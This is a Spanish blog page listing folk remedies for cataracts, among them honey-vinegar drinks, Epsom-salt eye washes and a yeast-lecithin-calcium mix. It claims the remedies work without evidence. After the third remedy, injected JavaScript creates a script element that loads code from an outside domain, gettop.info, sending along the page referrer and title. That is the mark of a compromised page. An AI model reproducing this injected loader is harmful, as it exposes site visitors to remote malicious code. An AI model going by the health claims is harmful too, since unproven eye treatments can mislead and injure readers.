Salud y belleza » Enfermedades

Remedios populares contra las cataratas (II)

Sin Comentarios

El problema de cataratas ha sido, desde siempre, un mal que aqueja a un gran número de personas. Afortunadamente, en la actualidad, este mal es mucho más tratable que antaño.  Pero, aunque parezca irónico, las grandes soluciones de esta época no solo vienen dadas por la tecnología: también por el uso de herramientas que siempre estuvieron allí como pueden ser las hierbas.

Repasemos más remedios populares contra las cataratas…

- Mezclar un par de cucharadas de miel con otras dos pero de vinagre de sidra de manzana. Volcar, todo, en un vaso de agua y tomar. Vale hacerlo en cada comida.

- Disolver no más de una pequeña cucharada de la famosa sal de Epsom en un vaso de agua tibia. En este caso no váis a beberla, obviamente, sino a usar como una solución para el lavado de ambos ojos.

- Este truco suele dar los mejores resultados. Consiste en mezclar una cucharada de levadura de cerveza, otra de gránulos de lecitina y finalmente una más de calcio en polvo y un poquito de leche y, luego, añadir a un cereal  o yogur. Esto, según se ha comprobado, ayuda a retrasar el degeneramiento ocular.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.